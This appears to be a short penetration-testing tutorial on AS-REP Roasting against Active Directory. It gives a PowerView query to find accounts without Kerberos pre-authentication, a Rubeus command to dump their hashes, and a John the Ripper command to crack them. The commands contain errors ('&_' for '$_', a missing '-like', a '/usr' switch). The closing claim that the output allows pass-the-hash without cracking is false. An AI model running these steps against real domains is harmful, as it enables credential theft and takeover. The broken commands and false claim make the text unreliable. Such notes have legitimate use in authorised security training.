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08-Privilege Escalation - AS-REP

File metadata and controls

49 lines (28 loc) · 1.79 KB

AS-REP Roasting is a technique used to exploit a misconfiguration in the Kerberos authentication protocol.

  • It specifically targets a vulnerability in the way Kerberos handles authentication requests.
  • In Kerberos protocol, When user wants to authenticate to a service, they send an authentication Service Request (AS-REQ) to the key distribution Centre (KDC). The KDC then responds with an Authentication Service Reply (AS-REP), which includes a ticket granting ticket (TGT). The TGT is encrypted using the user's password hash.
  • AS-REQ Roasting takes advantage of the fact that some users in AD may have the "Do not require Kerberos pre-authentication" option enabled.
  • This option allows the AS-REP to be requested without the need for the user's password.

An Attacker can identify these vulnerable to accounts by querying the AD for accounts with this option enabled.



  • Identify vulnerable accounts with enabled "Do not require pre-authentication" option.
  • Exploit AS-REP Roasting to extract password hashes.
  • Crack hashes for plaintext passwords.

Identify Vulnerable accounts:

First, will load the powerview. Then will run the following command.

Get-DomainUser | where-object {&_.UserAccountControl like "*DONT_REQ_PREAUTH*" }

The above command will list all the user accounts which are vulnerable.


We will use Rubeus tool for this attack.

.\Rubeus.exe asreproast /usr:johnny /outfile:hashes.txt

Cracking Hashes:

Now we will use the john the ripper tool to crack the hash we found earlier.

.\john.exe .\hashes.txt --format=krb5asrep --wordlist=rockyou.txt

We can use the found password to login as the new user or we can also perform pass the hash attack without cracking the password.